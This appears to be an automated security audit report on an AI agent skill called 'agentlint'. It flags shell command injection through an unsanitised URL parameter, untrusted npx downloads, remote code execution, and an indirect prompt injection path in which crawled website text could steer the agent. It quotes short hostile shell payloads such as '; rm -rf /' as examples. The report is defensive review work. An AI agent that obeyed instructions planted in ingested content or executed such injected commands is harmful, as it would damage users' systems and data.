agentlint
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
Findings: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to run npx @cjavdev/agent-lint <url> --agent. The <url> parameter is a user-controlled variable interpolated directly into a shell command. Without strict sanitization, an attacker could inject additional commands (e.g., "; rm -rf /" or "& curl attacker.com").
- [EXTERNAL_DOWNLOADS] (HIGH): The skill relies on npx to download and execute code from the npm registry at runtime. The package @cjavdev/agent-lint is not from a trusted organization or repository defined in the security policy, representing an untrusted dependency.
- [REMOTE_CODE_EXECUTION] (HIGH): The use of npx to fetch and execute a remote package, combined with shell-based invocation of user input, constitutes a high-risk remote code execution vector.
- [PROMPT_INJECTION] (MEDIUM): (Category 8: Indirect Prompt Injection) The skill ingests data from external websites through the audit process.
  - Ingestion points: External URLs crawled by the CLI tool.
  - Boundary markers: Absent; the agent is simply told to "Parse Results" and "Present Remediation Plan" from the output.
  - Capability inventory: Shell execution (npx), file access (implied via config flags).
  - Sanitization: None specified. An attacker-controlled website could include malicious text in its content (e.g., in a markdown file or meta tag) that the agent might interpret as instructions during the parsing and reporting phase.
Recommendations
- AI detected serious security threats
Audit Metadata